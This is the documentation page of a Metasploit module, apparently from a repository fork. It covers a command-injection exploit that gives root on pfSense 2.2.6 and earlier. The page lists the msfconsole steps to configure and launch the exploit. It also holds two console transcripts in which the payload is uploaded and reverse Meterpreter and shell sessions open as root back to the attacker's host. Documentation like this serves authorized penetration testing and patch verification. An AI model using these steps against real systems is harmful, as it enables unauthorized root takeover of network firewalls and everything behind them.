metasploit-gs/documentation/modules/exploit/unix/http/pfsense_graph_injection_exec.md at a87ae41d81d680b3ea202ff3c59ff3c052d273a7

adam/metasploit-gs

Fork 0

Files

T

wetw0rk 8f0e41e159 requested changes

2018-01-01 17:30:43 -06:00

2.9 KiB

Raw Blame History

Description

This module exploits a vulnerability in pfSense version 2.2.6 and before which allows an authenticated user to execute arbitrary operating system commands as root.

Vulnerable Application

This module has been tested successfully on version 2.2.6-RELEASE, 2.2.5-RELEASE, and 2.1.3-RELEASE

Installers:

Verification Steps

Start msfconsole
Do: use exploit/unix/http/pfsense_graph_injection_exec
Do: set RHOST [IP]
Do: set USERNAME [username]
Do: set PASSWORD [password]
Do: set LHOST [IP]
Do: exploit

Scenarios

pfSense Community Edition 2.2.6-RELEASE

msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit 

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600

meterpreter > sysinfo
Computer    : pfSense.localdomain
OS          : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015     root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
Meterpreter : php/freebsd
meterpreter > getuid
Server username: root (0)
meterpreter >

pfSense Community Edition 2.1.3-RELEASE

msf > use exploit/unix/http/pfsense_graph_injection_exec
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
uname -a

FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May  1 16:19:14 EDT 2014     root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8  amd64

2.9 KiB Raw Blame History